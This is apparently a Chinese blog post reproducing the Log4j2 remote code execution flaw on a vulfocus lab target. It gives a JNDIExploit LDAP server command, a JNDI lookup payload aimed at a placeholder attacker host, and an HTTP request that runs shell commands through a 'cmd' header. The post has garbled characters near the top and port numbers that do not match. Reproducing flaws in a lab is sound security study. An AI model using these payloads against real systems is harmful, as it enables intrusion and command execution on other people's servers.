npfs's blog

�Ὣ���¶�����

Apache Log4j2远程命令执行复现

Apache Log4j2远程命令执行复现

启动靶场环境

直接用vulfocus启一个环境。
官网地址:http://vulfocus.fofa.so/

用JNDIExploit启一个ldap的服务

1
java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 32703 -p 32701 -i 0.0.0.0

发包

payload更改如下:

1
payload=${jndi:ldap://xxx.xxx.xxx.xxx:32703/TomcatBypass/TomcatEcho}

数据包如下:(在请求头中添加cmd字段,后面跟上需要执行的命令即可。)

1
2
3
4
5
6
7
POST /hello  HTTP/1.1
Host: vulfocus.fofa.so:41624
Content-Type: application/x-www-form-urlencoded
cmd: whoami
Content-Length: 47

payload=${jndi:ldap://xxx.xxx.xxx.xxx:30703/TomcatBypass/TomcatEcho}

注意Content-Type的类型为:application/x-www-form-urlencoded

成功回显命令: